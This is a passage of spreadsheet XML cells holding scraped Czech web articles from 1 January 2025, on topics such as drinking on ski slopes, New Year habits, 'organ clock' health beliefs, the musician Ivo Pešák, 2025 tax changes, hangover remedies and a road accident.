prožívala hluboké deprese. Řešit je mě přinutila až jedna šílená myšlenka Tentokrát si zkusím udělat program Letos jsem bez přítelkyně, moje krátkodobá známost tráví svátky s rodinou a uvidíme se až v půlce ledna. Vymyslel jsem si na dny po Novém roce pestrý program. Rozhodl jsem se zaměstnat hlavně ruce a tak budu vyklízet sklep a malovat byt. Asi je to dost netradiční takhle v zimě, ale třeba to pomůže. Čím víc nepořádku nadělám, tím lépe. Jen ať nemám čas sedět a uvažovat o sobě, o svém životě a plánech na další rok. To si raději uženu svalovou horečku a budu se rozčilovat během malování. Jestli to pomůže, stane se z vysilující práce můj novoroční rituál. Další příběhy ze života → Mohlo by Vás zajímat: Veronika (36): Zimní období mě ubíjí. Jakmile zapadá odpoledne slunce, začíná pro mě depresivní období Text byl zpracován na základě skutečného příběhu, fotografie je jen ilustrační. Máte podobnou zkušenost? Svěřte se nám se svým příběhem, napište na redakce@lifee.cz . Jak jíst v padesáti, abyste si jídlo užívaly a nepřibíraly: Rady oblíbených gurmánek Dity a Karolíny Autor: Michaela Hájková Autor person Michaela Hájková</t>
  </si>
  <si>
    <t>20250101_336_3694394653_9ca9e80526b01f4c5a85.html</t>
  </si>
  <si>
    <t>9ca9e80526b01f4c5a85</t>
  </si>
  <si>
    <t>Alkohol na sjezdovkách: v Česku se zase bezuzdně pije, v zahraničí hrozí i statisícové pokuty a odnětí svobody</t>
  </si>
  <si>
    <t>Alkohol na sjezdovkách: v Česku se zase bezuzdně pije, v zahraničí hrozí i statisícové pokuty a odnětí svobody alkohol na sjezdovce Shutterstock Zima je tu v celé své kráse. Krkonoše i další česká pohoří praskají ve švech, ale místo čerstvého vzduchu často cítíme spíš alkoholové výpary. Z lyžařů a snowboardistů to táhne ve frontě na vlek nebo lanovku, v uzavřené kabince i na sedačkové lanovce, na toaletách, zkrátka tak nějak všude. Pokud patříte k těm, které to vyloženě bije do očí (nebo spíš do nosu), vítejte v mém světě. Lyžuju intenzivně několikrát týdně od začátku do konce sezóny a dokáže mě to vytočit i po letech. Proč alkohol na sjezdovky nepatří? Proč se pije? Protože je zima! Podpora alkoholu ? Úplně na hlavu! Jak je to s kontrolou? Dost bídně Alkohol na sjezdovce v Itálii , Rakousku a Francii Proč alkohol na sjezdovky nepatří? Když řídíte auto, nesmíte pít. Když jedete na kole (a není to zrovna v lese nebo na poli), nesmíte pít – v tomhle případě se vystavujete pokutě, když se na to přijde. Svého času se nesmělo pít na vodě. Na alkohol si dávají dobrý pozor i myslivci na honech. Ale na sněhu se lije ve velkém. Potěšující je sice fakt, že koncentrace lyžařů a snowboardistů s helmami na hlavách (a ještě líp s páteřáky na zádech) se za poslední roky rapidně zvýšila. To, že v čepici jezdí už jen výjimky, je patrné na první pohled. Jenže ani tyhle ochranné prvky nejsou všespásné, když se „kapku posilníme“. Na sjezdovkách se s nástupem moderních lyží nezřídka jezdí i rychlostí 100 km/h. Představa, že mě někdo v téhle rychlosti smete, protože neovládá svoje končetiny kvůli alkoholu , mě fakt děsí. Z takového člověka bych při újmě u soudu vytřískala jeho poslední korunu (nebo zlotý, protože našich sousedů se to týká neméně). A představa, že někdo takový srazí dítě, které svou konstitucí (dost možná doslova) ubije? Uf… 11 individuí, která na českých sjezdovkách potkáte i letos Proč se pije? Protože je zima! Jaký je to div – přijedete v zimě na hory a tam sníh a zima! Když to nevydržíte celý den, dejte si horké nealko nebo se běžte na chvíli ohřát. Ale lít do sebe kvůli tomu alkohol je nesmyslné. Nebo si snad dáte „panáčka“, když jdete plavat do bazénu, kde není teplota vody úplně po vašem? To, že je zima, je sice pravda. S tím je ale tak trošku třeba počítat. Rozhodně to není důvod popíjet alkohol a měnit míru sebekontroly, koncentrace, rovnováhy, úsudku a vidění a k tomu prodloužit vlastní reakční dobu. Podpora konzumace alkoholu ? Úplně na hlavu! Ještě horší než samotná konzumace alkoholu je ovšem její neustálá podpora. Když si nedáte „aperolek“, nejste cool. Když neposvačíte bombardino, jako byste na ty hory ani nevyjeli. A tak běžně na sociálních sítích ski areálů vidíme bary a jejich akce a taky pobídky „běžte se zahřát tam a tam“, ve velice „vkusné“ grafice se sklenkou nebo hrnkem alkoholu . Ale rozumím – na alkoholu se vydělává, tak co bychom ho nepropagovali? Co bychom ty lidi nenaváděli, aby se „posilnili“? Je vám z toho smutno? Mně taky. A to ani nejsem stoprocentní abstinent. Jen vím, kdy se pít hodí a kdy ne, především kdy tím neohrozím zdraví někoho jiného (protože pro mě za mě – klidně se pod vlivem na té sjezdovce nenávratně zmuchlejte, když do toho nenamočíte nikoho jiného). A co vyloženě bolí? Když si před vámi borec vytáhne z náprsní kapsy placatku a „neupejpá“ se. Kam na lyže v Itálii ? Rájů pro milovníky zimních sportů je tu dost Jak je to s kontrolou? Dost bídně Ještě nikdy jsem u nás neviděla, že by někdo někoho namátkově kontroloval kvůli požití alkoholu . Údajně se tím ale může zabývat obsluha vleků a lanovek, spíš ale v případě, že je člověk viditelně „nalámaný“, takřka se neudrží na nohou nebo se chová nevhodně. V těch nejzásadnějších případech může obsluha zneplatnit konkrétní skipas bez náhrady, případně přivolat policii. Ale co potom? Týpek tu bude zítra zase. Nebo v jiném skiareálu. Alkohol na sjezdovce v Itálii , Rakousku a Francii Když milovníci zimních sportů nemíří na naše hory, jezdí především do Itálie , Rakouska a Francie . Kromě toho, že můžete s alkoholem v krvi riskovat zdraví a životy jiných, mějte na paměti, že vaše pojišťovna, u které máte sjednané úrazové pojištění, vám může nevyplatit plnění, jakmile se zjistí, že jste požili. Alkohol na sjezdovce: Itálie Alkohol na sjezdovce: Francie Alkohol na sjezdovce: Rakousko Alkohol na sjezdovce: Itálie V Itálii je tolerance alkoholu v lyžařských areálech 0,4 promile. Můžete se tu setkat s namátkovou kontrolou a za překročení dané meze hrozí pokuta v přepočtu až 25 000 Kč. Při překročení 0,8 promile pak hrozí pokuty mnohem vyšší a až rok odnětí svobody. V Itálii zároveň musí mít každý, kdo se na lyže nebo snowboard vydá, sjednané pojištění odpovědnosti za škody. Alkohol na sjezdovce: Francie Ve Francii jsou pravidla nejpřísnější. Tolerance alkoholu je nulová, a když způsobíte nehodu a zjistí vám alkohol v krvi, automaticky jde veškerá vina za vámi. Bez diskuze. Můžete taky dospět k pokutě v přepočtu až 375 000 Kč, nebo si dokonce odpykat rok odnětí svobody. Alkohol na sjezdovce: Rakousko V Rakousku je to víceméně stejně benevolentní jako u nás, nicméně dýchnout vám tu může dát policie. Při nevhodném chování pod vlivem alkoholu vám může být zneplatněn skipas a můžete být vykázáni z areálu. Použité zdroje: policie.gov.cz/clanek/krajske-reditelstvi-policie-lbk-zpravodajstvi-cykliste-na- alkohol -pozor.aspx tdenik.cz/doprava/vodaci-pozor-na- alkohol -policiste-planuji-namatkove-kontroly-20250627.html novinky.cz/clanek/ekonomika-lyzovani- alkohol -tolerance-cr-italie-francie-40501655 top-pojisteni.cz/pojistovaci-poradna/novinky-ze-sveta-pojisteni/ alkohol -lyzovani Aktivity: Autor: redakce Alkohol na sjezdovkách: v Česku se zase bezuzdně pije, v zahraničí hrozí i statisícové pokuty a odnětí svobody Autor: Autor:</t>
  </si>
  <si>
    <t>20250101_337_3696835817_e4f65d4dc495300ee819.html</t>
  </si>
  <si>
    <t>e4f65d4dc495300ee819</t>
  </si>
  <si>
    <t>Jak se v novém roce zbavit nezdravých zlozvyků?</t>
  </si>
  <si>
    <t>Jak se v novém roce zbavit nezdravých zlozvyků? Sponzorované odkazy: Jednou z nejlepších částí nového roku je pocit nového začátku. Je ideální čas zamyslet se nad uplynulými 12 měsíci a během bilancování přemýšlet o tom, co chcete změnit a zažít ve své budoucnosti. Pro mnoho lidí je nový rok časem, kdy se mají zlepšit odstraněním špatného návyku. Bez ohledu na váš věk, pokud chcete snížit množství času, který strávíte děláním něčeho nezdravého, není lepší čas začít se změnou, než právě teď. A jak uvést heslo: „Nový rok, nové Já“ do praxe? S tím vám pomůže náš článek. Protože my se sice také snažíme měnit, zlepšovat, ale co se nemění, je naše nadšení z vašich ohlasů na naše články. Děkujeme vám všem za čtenářskou přízeň v roce 2024 a těšíme se, že v tom novém, nás budete nejen číst, ale snažit se našimi radami řídit, abychom byli všichni zdraví. A teď rychle zpátky k našemu článku o zlozvycích. Wikipedia definuje: Zvyk nebo zvyklost je ustálený vzorec chování jednotlivce nebo členů určitého společenství, zdůvodněný často tím, že se tak chovali „od nepaměti“, přinejmenším po delší dobu. Individuálně získaný a často nutkavý zvyk se nazývá návyk, špatnému návyku se říká zlozvyk. To já jen, abych připomněla, o čem nepěkné zvyky, zvané zlozvyky vlastně jsou. Když něco řádně pojmenujeme, snáze se proti tomu bude bojovat. Jaké jsou nejčastější zlozvyky, kterých se lidé chtějí po Vánocích zbavit?: Stravovací návyky: přejídání, nerovnováha ve stravě Pohyb: nedostatek pohybu, sedavý způsob života Spánek: poruchy spánku, ponocování Stres: život ve stresu, nadměrné nakládání si povinností, přehnané reakce na kritiku Závislosti: nadměrná konzumace alkoholu , kouření, drogy Ostatní: odkládání povinností, nedochvilnos, nedostatečný pitný režim Kouření Kouření není jen zlozvyk, je to past. Každý tah z cigarety vás přibližuje k vážné nemoci. Chcete-li žít naplno a chránit své blízké, rozhodněte se pro život bez kouře. Přestat kouřit není snadné, ale není to ani nemožné. Existuje mnoho způsobů, jak s kouřením seknout jednou pro vždy. Nebojte se požádat o podporu své rodiny, přátel nebo odborníka. Existují i tablety, žvýkačky a náplasti, které pomohou překonat první nejhorší období při odvykání kouření. Alkohol Začněte postupně: omezte množství alkoholu , vyberte si dny, kdy nebudete pít vůbec. Vyhledávejte podporu: promluvte si s blízkými, zkuste podpůrné skupiny nebo se obraťte na odborníka. Najděte si zdravé náhrady: nahraďte alkohol jinými aktivitami, které vám dělají radost. Pokud je vaše závislost na alkoholu opravdu velká, bez pobytu v léčebně se neobejdete, bohužel většina lidí, kteří jsou hodně závislí na alkoholu si svůj problém nechtějí připustit. To samé platí i o závislosti na drogách. Špatná životospráva Špatná strava – podobně jako kouření, může špatná strava přispět k rozvoji onemocnění, kterým lze včas předejít, jako je cukrovka, obezita nebo vysoký cholesterol. Může také zvýšit vaše šance na srdeční onemocnění, osteoporózu, onemocnění dásní a dokonce i některé druhy rakoviny. Další rady a tipy Najdi si kamaráda, se kterým budeš sdílet své cíle a pravidelně se motivovat. Společně si stanovte malé, dosažitelné cíle a pravidelně sledujte svůj pokrok. Oslavuj každý úspěch, ať už je sebemenší. Každý krok vpřed je důležitý. Příběhy lidí, kteří úspěšně překonali závislost, mohou být velmi inspirativní. Vy sami si můžete vést deník, do kterého si budete zapisovat své úspěchy. To, že jeden den „ujedete“ neznamená, že musíte se svou snahou nadobro přestat. Ráno začíná další den, kdy se můžete začít snažit znovu. Článek Jak se v novém roce zbavit nezdravých zlozvyků? byl publikován dnes v rubrice Návykové látky. Autorem článku je Petra Havlíková. Pro diskusi slouží komentáře (0). Prosím čekejte... Podobné články Prosím čekejte... Top 10 Magazín Uzdravim.cz se tématikou zdraví a nemoci, zdravotní problémy. Prosím čekejte... Rubrika transition_slide weblog</t>
  </si>
  <si>
    <t>9</t>
  </si>
  <si>
    <t>20250101_338_3694225463_f5dbf036e7c7f547ba52.html</t>
  </si>
  <si>
    <t>f5dbf036e7c7f547ba52</t>
  </si>
  <si>
    <t>Orgánové hodiny boří mýty. Kdy si dát beztrestně sladké a proč nejíst k snídani zeleninu a ovoce?</t>
  </si>
  <si>
    <t>Orgánové hodiny boří mýty. Kdy si dát beztrestně sladké a proč nejíst k snídani zeleninu a ovoce? Naše tělo má svůj vlastní harmonogram, svůj biologický rytmus, podle kterého fungují jednotlivé orgány. Každý orgán má specifické časy, kdy je jeho činnost maximální a kdy je naopak v klidu. A není to žádný nový objev. Tento biorytmus využívali už staří Číňané. Ke každé dvouhodině je přiřazen jeden orgán, který v danou dobu tzv. jede naplno, nebo má naopak aktivitu nejnižší. Zdroj: Youtube 1. až 3. hodina Aktivují se játra, začínají pracovat naplno. V noci se krev stahuje do jater, kde se čistí. V této době nastává útlum a mozek je nejméně okysličován. Tady pozor při činnostech vyžadujících zvýšenou opatrnost, například při cestování. V tuto dobu se rovněž budí „žlučníkáři“, protože játra a žlučník jsou párové orgány. Ke třetí hodině ranní se budí i ženy s premenstruačním syndromem anebo v období přechodu. Nedoporučuje se pít alkohol , kávu ani kouřit a také se vyhněte konzumaci těžkých a mastných jídel. Minimální aktivitu vykazuje tenké sřevo. 3. až 5. hodina V činnosti jsou plíce , proto se obvykle v tuto dobu budí kuřáci, astmatici, nemocní na průdušky či rýmu a se záněty cest dýchacích. Zvýšená je psychická a emocionální zátěž. V této době také člověk pociťuje největší strach a úzkost. Každá maličkost nabývá obrovského významu. Z pohledu přírody je to údajně hodina fyzického i mentálního zotavování, protože jsme na nejnižší kognitivní i fyzické úrovni. Nejnižší aktivitu má v tuto dobu močový měchýř. 5. až 7. hodina V největší činnosti je tlusté střevo. Pokud vaše energie plyne hladce, tak byste se v ideálním případě měli ráno jít vyprázdnit. Je dobré se v tuto dobu vyhnout stresu a spěchu. Je třeba se dost napít vlažného čaje, vody a jíst lehkou snídani. V tuto dobu nejvíce odpočívají ledviny. 7. až 9. hodina Do aktivity se dostává žaludek , který potřebuje smíchat žaludeční šťávy se šťávami z dvanácterníku a slinivky s lehkým obsahem, aby se propláchlo tenké střevo a mohlo později dobře zpracovat přijatou potravu. Neměli bychom konzumovat studené pokrmy, jakými jsou mléčné výrobky, vločky, syrová zelenina nebo tropické plody. Teorie, že bychom ráno měli jíst ovoce, není správná, protože ovoce ochlazuje organismus. Tělo potřebuje být v teple, není vhodná studená sprcha nebo koupel. Nepijte v tuto dobu studené. Je vhodné nalačno vypít plnou sklenici teplé vody, může být v ní i pár kapek citronu na likvidaci kvasinek v trávicím traktu. Nejmenší aktivitu má osrdečník. pexels.com Snídaně je nejdůležitější pokrm dne. Pozor ale na to, co vložíte do úst. Tělu to nemusí udělat dobře, i když máte za to, že pro sebe děláte to nejlepší 9. až 11. hodina Na vrcholu činnosti jsou slinivka břišní a slezina . V této době nepožívejte alkohol ! Je to jediná doba, kdy je tělo schopné strávit sladkosti a přitom nejdou „na tloušťku“. Tip na snídani: Nejlepší je kaše z jáhel, protože jáhly jsou lékem na slinivku. Vynechávání jídel ráno není zdravé a také může vést k nerovnováze hladiny cukru v krvi. Vyhýbat bychom se měli přílišné fyzické činnosti, ale za to můžeme podávat vysoké duševní výkony. Kolem 11. hodiny nastává dopolední výkonnostní vrchol. 11. až 13. hodina Je doba aktivní činnosti srdce , není proto dobré ho zatěžovat velkým množstvím potravy, kávou ani alkoholem . V tuto hodinu nám totiž nejméně pracuje žlučník. Naopak krevní tlak je na svém maximu. Nastává mírný fyzický i duševní útlum. Pozor na úrazy, pozor při řízení auta! Poledne je vrcholem dne a nejvíce energie je v srdci. Někdo může prožívat i nervozitu a úzkosti. Je vhodná relaxační procházka přírodou nebo krátký spánek. 13. až 15. hodina K nejvyšší činnosti se dostává tenké střevo . To naše tělo zásobuje další potřebnou energií, kterou můžeme využít v rámci psychické nebo fyzické aktivity, ať už v práci nebo doma. Je to nejlepší doba na oběd. Kdo lehce snídal mezi 7. a 9. hodinou, tomu nebude po obědě těžko. Je zajímavé, že se snižuje citlivost zubů. Lidé, kteří mají strach z ošetření chrupu, by měli právě v tuto dobu navštívit zubaře. Shutterstock Bojíte se zubařů? Pak k nim choďte v čase od 13. do 15. hodiny 15. až 17. hodina Nejvíce pracuje močový měchýř a nejméně plíce . Je nejlepší čas na to pít bylinné čaje. Lze si dát i kávu, ale pozor, jeden díl kávy vyrovnat třemi díly vody! Trávící systém je schopný přijmout vydatné jídlo, tělesná aktivita stoupá a dosahuje druhého výkonnostního vrcholu. Nejlepší doba na sport. Kolem 17. hodiny si ještě můžete dát lehkou svačinu, a kdo chce zhubnout, nebude po 17 hodině jíst. 17. až 19. hodina Se západem slunce se začnou o slovo hlásit ledviny a močový měchýř, který vylučuje toxiny. Velmi důležité je vyloučit vše, co jim škodí, to znamená tuky, cukr, sůl, limonády, chemikálie, kávu, alkohol , chlad, stresy. Pánové, kteří mají touto dobou ve zvyku chodit na pivo , by měli jít už mezi 15. až 17. hodinou. Pak už pijte vydatně pramenitou vodu, bylinné čaje, jezte zeleninu a tmavé pečivo. Kolem 19. hodiny je vhodný čas k užívání všech druhů biokalcia a Cordycepsu, což je jedna z nejsilnějších vitálních hub a největší dobíječ energie. V tuto dobu nejméně pracuje tlusté střevo. 19. až 21. hodina Do činnosti se dostávají osrdečník a krev . Energie osrdečníku zahrnuje vztahové problémy, úzkost, nervozitu a nespavost. Člověk také dobře vnímá a je proto vhodná doba na studium i návštěvy divadla nebo koncertů. Pokud užíváte léky, tento časový úsek je nejvhodnější dobou na jejich konzumaci. Nejúčinnější je i působení antibiotik a lze provádět natírání bolestivých míst. Nejméně pracuje žaludek, proto už bychom v tuto dobu měli mít večeři za sebou. Gorodenkoff / Shutterstock Potřebujete pracovat či se učit? Už víte, kdy je ten správný čas 21. až 23. hodina Doba činnosti „tří ohřívačů“. Je to doba, kdy se tělo připravuje na spánek, chce klid, proto bychom neměli dělat nic pro jeho aktivaci. Nejíst, nekouřit, nepít alkohol . Nejmenší aktivitu vykazují slezina a slinivka. Trojitý ohřívač jsou 3 energetická centra napojená na vesmír. První je 3 prsty pod krční jamkou, druhé je 3 prsty nad pupkem a třetí 3 prsty pod pupkem. Řídí se zákonem „život má přednost“ a pokud užíváme doplňky stravy, tělo si je v tuto dobu dá tam, kde je nejvíc potřebuje. Jde o ideální čas pro užívání přírodních produktů. Před spaním se pokuste uklidnit, zapálit svíčky a vůbec dělat jen příjemné věci, v létě pomáhá posedět pod širým nebem. Druhý den se probudíte odpočatí. A na závěr upozornění, že naše orgány takto fungují bez ohledu na změnu času. V létě si tedy orgánové hodiny posuňte o hodinu. Tedy co platí v zimě v 1 hodinu, v létě nastane ve 2 hodiny a tak dále. Zdroje: iGlanc.cz , YouTube Ancient Life Hacks , Healthline Media , NIGMS - National Institutes of Health , University of Southampton Související články NMK-Studio / Shutterstock pexels.com Shutterstock Gorodenkoff / Shutterstock</t>
  </si>
  <si>
    <t>20250101_339_3700757476_4e707d731efc440414a2.html</t>
  </si>
  <si>
    <t>4e707d731efc440414a2</t>
  </si>
  <si>
    <t>Ivo Pešák říkával: Denně 20 piv , a to nejdu do hospody. Žil na plno, zemřel na operačním stole Ivo Pešák , svérázný umělec s nepřehlédnutelnou vizáží, zanechal na české hudební scéně výraznou stopu. Nejvíce se proslavil ve skupině Banjo Band Ivana Mládka . Díky videoklipu k písni Jožin z bažin, v němž ztvárnil hlavní roli, se stal hvězdou i v zahraničí. Dožil se 66 let. Letos by mu bylo osmdesát. Ivo Pešák , uznávaný hudebník s vizáží nemotorného týpka s plnovousem, doplatil na svou životosprávu. Miloval všechno, co bylo nezdravé. Tučná jídla, alkohol . V ničem se nešetřil. „Užíval si života plnými doušky. Hodně kouříval a měl rád pivo . Říkával: ‚Denně 20 piv a to nejdu do hospody.‘ Vždycky to byl ale totální profík. Nikdy se nestalo, že by nepřišel na zkoušku nebo na kšeft. Vždy byl perfektně připravený. Totální sluchař, hrával ve filharmonii,“ zavzpomínal pro web Prima ženy Václav Upír Krejčí , který s Pešákem tvořil hudební dvojici nazvanou Dýza Boys. Několik měsíců před tím, než Ivo Pešák nečekaně zemřel, odcestoval se skupinou na pozvání koncertovat do amerického Chicaga . „Když jsme tam přiletěli, Ivo povídá, že musí zavolat manželce, aby neměla starost. ‚To není možný, Upíre ! Já do mobilu třikrát naťukám PIN, a ono mi to napíše, že to chce PUK,‘ říkal. Tak si zablokoval telefon. Asi za pět dní mě požádal, jestli mu půjčím mobil, aby zavolal své ženě Miládce. Vytočil jsem její číslo a předal mu můj telefon. ‚Nazdar Miládko, prosím tě, ty dva litry vodky, co si zabalila do těch ručníků, tak vydržely. Jednu už mám vypitou. Ahoj,‘ sdělil jí Ivo a zavěsil,“ popsal s úsměvem Upír Krejčí . Po návratu domů Pešáka odvezli do nemocnice. „Asi za měsíc mi volá a říká: ‚ Upíre , manželka a primář mně chtějí udělat bypass, co ty na to?‘ Odpověděl jsem mu, že si ho nevezmu na svědomí a že se musí rozhodnout sám. ‚Tak to udělám,‘ oznámil mi. A bohužel na tom operačním stole tam zemřel... Byl to bezvadnej člověk. Chybí mi strašně moc. Pořád je to silný... Mám ho pořád uloženého v mobilu, mám pocit, že tady stále je,“ prohlásil Upír Krejčí. Ivo Pešák se během života stačil oženit dvakrát. S první manželkou měl dva potomky, s druhou ženou Miladou děti neměli. Právě s ní prožil posledních téměř 30 let svého života. Během komického čísla tekla krev Nejvíce se proslavil ve skupině Banjo Band Ivana Mládka , se kterým pravidelně účinkoval v televizních pořadech. Obvykle hrával naivní hlupáky. „V mnoha případech se to Ivovi líbilo, v mnoha zase ne. Ale užili jsme si strašně legrace, víc v šatně než na jevišti. Jednou jsem ho v rámci jedné scénky měl bouchnout po hlavě balalajkou. Jedna byla opravdová, druhá falešná. Přestože to bylo všechno pečlivě nazkoušené, do ruky se mi dostala ta opravdová. Pešákovi tekla po hlavě krev a Ivan Mládek mě pak honil po divadle,“ přidal jednu z příhod Václav Upír Krejčí. redaktor FTV Prima Autor: David Laštovka Autor person David Laštovka</t>
  </si>
  <si>
    <t>353580</t>
  </si>
  <si>
    <t>20250101_34_3698727262_942f7d683c341b17caa4.html</t>
  </si>
  <si>
    <t>942f7d683c341b17caa4</t>
  </si>
  <si>
    <t>Daně a odvody v roce 2025</t>
  </si>
  <si>
    <t>Daně a odvody v roce 2025 Moderátor Barbora Kroužková : Stvrzení největší zakázky v historii země je v plánu na jaře. ČEZ a jihokorejská společnost KHNP mají podepsat smlouvu na stavbu nových bloků dukovanské jaderné elektrárny. Moderátor Michal Kubal : A hned se začátkem nového roku vzrostly důchody, průměrně o 358 korun na víc než 21 tisíc. Zvedla se i minimální mzda: o 1 900 korun na 20 800. Moderátor Barbora Kroužková : Drobným podnikatelům, kuřákům nebo konzumentům tvrdého alkoholu ode dneška stouply odvody. Téměř 400 tisíc živnostníků s minimálním sociálním pojištěním zaplatí měsíčně na povinných zálohách o 907 korun víc než dosud. Stát díky zvýšení vyměřovacího základu plánuje letos vybrat o 4 a půl miliardy víc. Jan Skopeček / ODS /, místopředseda PS: Já samozřejmě ze zvyšování daní a živnostníků zvlášť velkou radost nemám. Já jsem to bral jako nutné zlo, nutný kompromis toho daňového balíčku, který jsme schvalovali a který měl ambici přispět ke konsolidaci veřejných financí vedle té výdajové strany. Moderátor Barbora Kroužková : Výrazně víc budou nově platit kvůli balíčku i živnostníci s příjmy do milionu ročně, kteří využívají paušální daň. Tento odvod, zahrnující sociální i zdravotní pojištění a daň z příjmu, se zvedá zhruba o 1 200 korun na 8 700. Autor Petr Vašek: Tomáš Daněk pracuje na stavbách. Je na volné noze. Minulý rok odváděl státu na sociálním pojištění 3 852 korun měsíčně. Ode dneška mu měsíční sociální odvody vzrostly o víc než 900. Na zdravotním pojištění k tomu pak zaplatí 175 korun měsíčně navíc. Celkem bude odvádět státu na pojistném o téměř 1 100 víc než loni. Tomáš Daněk: Každý měsíc každá koruna je znát. Zvlášť když jsou slabší měsíce. Když jsou měsíce, když se jako daří, tak je to jako v pohodě, ale pak jsou samozřejmě měsíce, kdy ty výdaje jsou prostě vyšší a nezbývá nám na nějaký osobní vyžití a tak dále. Autor Petr Vašek: Jemu a dalším téměř čtyřem stům tisícům živnostníků s minimálními zálohami stát vyšší povinné odvody částečně vyváží tím, že budou mít jednou vyšší důchody. Miloš Nový /TOP 09/, poslanec: Většina těch živnostníků skutečně bere dejme tomu poloviční starobní důchod, než jaký je průměr. Ale do systému vlastně odváděli čtvrtinu. Takže vlastně jsme se snažili napravit tuto "nespravedlnost". Josef Bernard /STAN/, poslanec: Tady existuje skupina expertů, která říká, že to pořád je nevyvážené. Někteří říkají: Nešahejte na ně. Někteří říkají: Udělejte tam ještě větší zásah. My jsme postupovali v nějakých krocích, které byly dohodnutelné v rámci koalice. Autor Petr Vašek: Pokud by Tomáš Daněk odváděl minimální zálohy celý pracovní život, tedy zhruba 40 let, vzrostla by mu s letošním nárůstem odvodů starobní penze o téměř 1 400 měsíčně. Tomáš Daněk: Situace je teď taková, že do důchodu mám hodně daleko a přijde mi to teďka jako docela, může to být zátěž pro nás jako živnostníky. Marek Výborný /KDU-ČSL/, ministr zemědělství: Já jsem přesvědčen, že jsme šli tou mírou, která je unesitelná. Autor Petr Vašek: Většina opozičních stran naopak považuje růst odvodů výměnou za vyšší penze za neobhajitelný. Alena Schillerová /ANO/, poslankyně: Nechte je být, nechte je žít. Oni nečerpají žádnou dovolenou, žádnou nemocenskou, jejich jedinou "výhodou" je nižší sociální pojištění. Tomio Okamura / SPD /, poslanec: Vláda jde proti živnostníkům, vláda jde proti malým a středním podnikatelům, vláda jde proti ekonomické prosperitě, protože živnostníci jsou páteří ekonomiky. Ivan Bartoš /Piráti/, poslanec: Nízké odvody a neřešení té situace pak vede k tomu, k těm významně nízkým důchodům. Postupný náběh a srovnání této věci by měl být. Autor Petr Vašek: Poslanci schválili zvýšení některých daní a odvodů pro rok 2025 už předloni, při hlasování o vládním úsporném balíčku. Ten kabinet ve sněmovně prosadil 13. října 2023.</t>
  </si>
  <si>
    <t>20250101_340_3694214368_09ca0714c38313f48d49.html</t>
  </si>
  <si>
    <t>09ca0714c38313f48d49</t>
  </si>
  <si>
    <t>Denní výběr: Požár na ubytovně v Brně. Hasiči vyhlásili druhý stupeň poplachu</t>
  </si>
  <si>
    <t>20250101_341_3694173766_12825dec93830fc62800.html</t>
  </si>
  <si>
    <t>12825dec93830fc62800</t>
  </si>
  <si>
    <t>Jak na bolení hlavy po Silvestru: Tipy na rychlou úlevu</t>
  </si>
  <si>
    <t>Jak na bolení hlavy po Silvestru: Tipy na rychlou úlevu Lifestyle 1. 1. 2025 Zdroj fotografie: Pexels / Canva Silvestrovské oslavy se často nesou ve znamení dobrého jídla, pití a veselí. Ale druhý den ráno může radost z oslav vystřídat nepříjemná bolest hlavy – klasický příznak kocoviny. Co pomáhá na rychlou úlevu a návrat do formy? Hydratace je klíčová Jedním z hlavních důvodů kocoviny je dehydratace způsobená alkoholem . Hned ráno (nebo ještě lépe těsně před spaním) začněte pít hodně vody. Ideální je kombinovat čistou vodu s minerálkami, které doplní ztracené elektrolyty. Dopřejte si vydatnou snídani Prázdný žaludek může zhoršovat příznaky kocoviny. Sáhněte po potravinách bohatých na bílkoviny a sacharidy, jako jsou vejce, celozrnné pečivo nebo banány. Tyto potraviny pomohou stabilizovat hladinu cukru v krvi a dodají vám potřebnou energii. Zázračná síla vývaru Horký slepičí nebo hovězí vývar je osvědčený lék na kocovinu - a opravdu funguje! Obsahuje živiny, které tělu pomohou regenerovat, a zároveň zahřeje a hydratuje. Ideální volba pro pomalý start do nového roku. Káva? S mírou Pokud jste zvyklí na ranní šálek kávy, může vám pomoci zmírnit bolest hlavy. Ale pozor, káva také odvodňuje, takže ji kombinujte s dostatečným množstvím vody. Je třeba si také zapamatovat, že pokud máte ještě z předešlé noci „hladinku“, kofein vám jí rozhodně nesníží. Káva nepomáhá odbourat alkohol v krvi, ať už se to o ní říká jakkoliv často! Čerstvý vzduch a pohyb I když se vám nemusí chtít, krátká procházka na čerstvém vzduchu dokáže zázraky. Pohyb rozproudí krevní oběh, okysličí mozek a pomůže tělu rychleji odbourat zbytky alkoholu . Zázvorový čaj na nevolnost Pokud vás kromě bolesti hlavy trápí i nevolnost, sáhněte po zázvoru. Zázvorový čaj uklidní žaludek a podpoří detoxikaci organismu. Odpočinek je základ A nakonec si dejte čas na regeneraci. Dlouhý spánek, klid a pohodová atmosféra pomohou tělu dostat se zpět do pohody naprosto nejlépe. Pamatujte, že nejlepší prevencí je střídmost, ale pokud se to během silvestrovských oslav nepovedlo, tyto tipy vám pomohou zvládnout první den nového roku s úsměvem. 🎉 Autor článku: Rádio Blaník je takové rodinné rádio. Hrajeme české písničky, které dělají lidem radost. Na web přinášíme různé zajímavosti i užitečné informace. Právě to má pro mě velký smysl. Nejnovější články Autor: Ivanna Balkovská Autor person Ivanna Balkovská</t>
  </si>
  <si>
    <t>20250101_342_3694214294_df916dd86e2c0a5c9cb4.html</t>
  </si>
  <si>
    <t>df916dd86e2c0a5c9cb4</t>
  </si>
  <si>
    <t>Denní výběr: Na rozhlednu na Sedle mířily na Silvestra stovky lidí, lákalo i občerstvení</t>
  </si>
  <si>
    <t>20250101_343_3694184324_018e9158eba29a8a0854.html</t>
  </si>
  <si>
    <t>018e9158eba29a8a0854</t>
  </si>
  <si>
    <t>Silvestrovská jízda hrůzy. Řidička osobního auta zkřížila cestu rozjeté cisterně</t>
  </si>
  <si>
    <t>Silvestrovská jízda hrůzy. Řidička osobního auta zkřížila cestu rozjeté cisterně „Podle zjištěných informací 57letá řidička osobního vozidla jedoucí od Chvaletic na Horušice nedala přednost cisterně jedoucí po hlavní komunikaci ve směru na Přelouč a došlo ke střetu," popsala situaci na křižovatce silnic I/2 a II/338 policejní mluvčí policie Iveta Kopecká . play_fill Nehody Oba řidiči utrpěli zranění, s nimiž byli převezeni do nemocnice. Na místě provedené dechové zkoušky na alkohol byly u obou účastníků negativní. Hromadná dopravní nehoda na silnici I/38 mezi Drobovicemi a Horkami | Video: Deník/ Michal Bílek Autor: Pavlína Roztočilová Autor Pavlína Roztočilová</t>
  </si>
  <si>
    <t>20250101_344_3694130943_48c90562c0e1054c4b1d.html</t>
  </si>
  <si>
    <t>48c90562c0e1054c4b1d</t>
  </si>
  <si>
    <t>V Česku vzniká síť nových obchodů. Tuzemské produkty za poloviční cenu. Češi jsou z toho štěstím bez sebe</t>
  </si>
  <si>
